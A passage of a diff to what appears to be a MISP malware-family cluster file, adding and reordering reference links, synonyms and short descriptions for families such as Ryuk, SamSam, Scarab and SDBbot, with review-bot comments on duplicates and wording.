+ "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/",
+ "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/",
+ "https://blog.reversinglabs.com/blog/hunting-for-ransomware",
+ "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://twitter.com/IntelAdvanced/status/1353546534676258816",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
 "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
- "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
- "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
 "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://github.com/scythe-io/community-threats/tree/master/Ryuk",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
+ "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
+ "https://www.youtube.com/watch?v=CgDtm05qApE",
+ "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://twitter.com/Prosegur/status/1199732264386596864",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders",
 "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.youtube.com/watch?v=BhjQ6zsCVSc",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
+ "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://twitter.com/SophosLabs/status/1321844306970251265",
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/",
+ "https://blog.cyberint.com/ryuk-crypto-ransomware",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
+ "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/",
+ "https://www.youtube.com/watch?v=Of_KjNG9DHc",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/",
+ "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf",
+ "https://twitter.com/IntelAdvanced/status/1356114606780002308",
+ "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
+ "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
+ "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
+ "https://www.youtube.com/watch?v=7xxRunBP5XA",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
 ],
 "synonyms": [],
 "type": []
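Review bot: The new Ryuk description has two grammatical slips, `It is has been observed` (drop `is`) and `Ryuk and Hermes ransomware shares pieces of codes` (`share pieces of code`), and it ends with a trailing space before the closing quote. Every entry's first ref points at malpedia.caad.fkie.fraunhofer.de, so this text is presumably copied from that export and the wording fix belongs upstream, or it will be overwritten on the next regeneration. The reference list itself looks consistent: the four removed links (cybereason triple-threat, latimes, crowdstrike big-game-hunting, mcafee rush-to-attribution) all reappear at new positions on the added side, so nothing is lost in this hunk.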
@@ -14877,15 +27219,69 @@
 "uuid": "62c79940-184e-4b8d-9237-35434bb79678",
 "value": "Ryuk"
 },
+ {
+ "description": "Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer",
+ "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/",
+ "https://twitter.com/VK_Intel/status/1171782155581689858"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0f0e5355-1dbf-4af4-aebf-88b08e6272a4",
+ "value": "Ryuk Stealer"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo",
+ "https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "188528f1-1292-4aaa-b1e6-3fe0ab78ff81",
+ "value": "Sadogo Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko",
+ "https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "60124475-1c52-4108-81cf-7b9fa0f0d3bb",
+ "value": "Saefko"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet",
+ "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d16f9dc6-290d-4174-8b47-a972cc52dac7",
+ "value": "SafeNet"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom",
 "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
- "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
 "http://malware-traffic-analysis.net/2017/10/13/index.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/"
+ "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/",
+ "https://www.cert.pl/en/news/single/sage-2-0-analysis/"
 ],
 "synonyms": [
 "Saga"
@@ -14895,16 +27291,32 @@
 "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431",
 "value": "SAGE"
 },
+ {
+ "description": "FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon",
+ "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "08817c1e-3a90-4c9b-b332-52ebe72669c5",
+ "value": "SaiGon"
+ },
 {
 "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat",
- "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf",
 "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
- "https://www.secureworks.com/research/sakula-malware-family"
+ "https://www.secureworks.com/research/sakula-malware-family",
+ "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1",
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99"
 ],
 "synonyms": [
 "Sakurel"
@@ -14919,9 +27331,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea",
- "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf",
+ "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/",
+ "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware"
+ ],
+ "synonyms": [
+ "BadCake"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e",
@@ -14945,17 +27361,40 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
- "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
- "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
- "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
- "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
- "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat",
+ "https://business.xunison.com/analysis-of-samorat/"
 ],
 "synonyms": [],
 "type": []
 },
+ "uuid": "e2db8349-7535-4748-96ac-a18985cf66b8",
+ "value": "SamoRAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
+ "https://www.secureworks.com/research/threat-profiles/gold-lowell",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
+ "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
+ "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
+ ],
+ "synonyms": [
+ "Samas"
+ ],
+ "type": []
+ },
 "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a",
 "value": "SamSam"
 },
@@ -14964,6 +27403,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny",
+ "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
 "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
 ],
 "synonyms": [
@@ -14979,7 +27419,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache",
- "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html"
+ "https://blog.alyac.co.kr/m/2219",
+ "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails",
+ "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html",
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
+ "https://blog.alyac.co.kr/2219"
 ],
 "synonyms": [],
 "type": []
@@ -14992,10 +27436,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
 "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a",
 "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html"
 ],
 "synonyms": [
+ "ENDCMD",
 "Hussarini"
 ],
 "type": []
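Review bot: The SappyCache refs now list the same Alyac article twice, as `"https://blog.alyac.co.kr/m/2219"` and `"https://blog.alyac.co.kr/2219"` (mobile and desktop URL of one post), so one of the two lines should go. The same one-article-two-URLs pattern appears in the Sedreco hunk, where the Securelist post is kept in both its new `securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/` form and the old `securelist.com/blog/research/72924/...` form, and in the ShadowHammer hunk, where the F-Secure write-up is listed under both `blog.f-secure.com` and `labsblog.f-secure.com`. Since the commit message says this file is refreshed from the Malpedia MISP export, the duplicates most likely come from upstream, and a canonicalisation step for known host aliases in whatever script produces this file would keep the refs arrays from accumulating them on each update.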
@@ -15030,14 +27476,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
 "https://www.sangfor.com/source/blog-network-security/1094.html",
- "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
+ "https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html",
 "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2",
- "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
+ "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
 "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
+ "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
 "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/",
 "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/"
 ],
 "synonyms": [
+ "5ss5c",
 "DBGer",
 "Lucky Ransomware"
 ],
@@ -15051,6 +27499,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana",
+ "https://blog.reversinglabs.com/blog/retread-ransomware",
 "https://www.cylance.com/threat-spotlight-satan-raas"
 ],
 "synonyms": [],
@@ -15059,11 +27508,25 @@
 "uuid": "09b555be-8bac-44b2-8741-922ee0b87880",
 "value": "Satana"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla",
+ "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "957f6c4a-c750-4ba3-820f-5a19d444a57a",
+ "value": "Satellite Turla"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
 "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/"
 ],
 "synonyms": [],
@@ -15086,6 +27549,39 @@
 "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf",
 "value": "ScanPOS"
 },
+ {
+ "description": "Ransomware with ransomnote in Russian and encryption extension .scarab.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey",
+ "https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html"
+ ],
+ "synonyms": [
+ "MVP",
+ "Scarab",
+ "Scarab-Russian"
+ ],
+ "type": []
+ },
+ "uuid": "76d20f49-9367-4d36-95d2-7ef8ff55568d",
+ "value": "Scarabey"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "http://malware-traffic-analysis.net/2017/11/23/index.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694",
+ "value": "Scarab Ransomware"
+ },
 {
 "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.",
 "meta": {
@@ -15113,6 +27609,20 @@
 "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e",
 "value": "Scote"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf",
+ "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b5d90140-f307-402c-9d7f-9cdf21a7cb31",
+ "value": "Scranos"
+ },
 {
 "description": "",
 "meta": {
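Review bot: The new Scarabey object carries `"Scarab"` in its `synonyms` while the same hunk adds a separate `"Scarab Ransomware"` cluster (uuid c1ccba65-…, win.scarab_ransom), so a match on the bare name "Scarab" now resolves to two different uuids. If Malpedia treats these as distinct families, the synonym list on Scarabey should be narrowed to the unambiguous names (`"MVP"`, `"Scarab-Russian"`) or the overlap should at least be stated in the Scarabey description; if they are the same family, one object should be merged into the other rather than shipping both. This is worth checking against the upstream export before the next regeneration, since a hand edit here would be overwritten.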
@@ -15130,15 +27640,53 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
+ "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "https://github.com/Tera0017/SDBbot-Unpacker",
+ "https://vblocalhost.com/uploads/VB2020-Jung.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe"
 ],
 "synonyms": [],
 "type": []
 },
+ "uuid": "48bbf0b7-d8c3-4ddb-8498-cf8e72b210d8",
+ "value": "SDBbot"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
+ ],
+ "synonyms": [
+ "SeaDuke",
+ "Seadask"
+ ],
+ "type": []
+ },
 "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207",
- "value": "SeaDaddy"
+ "value": "SEADADDY"
 },
 {
 "description": "",
@@ -15153,6 +27701,23 @@
 "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c",
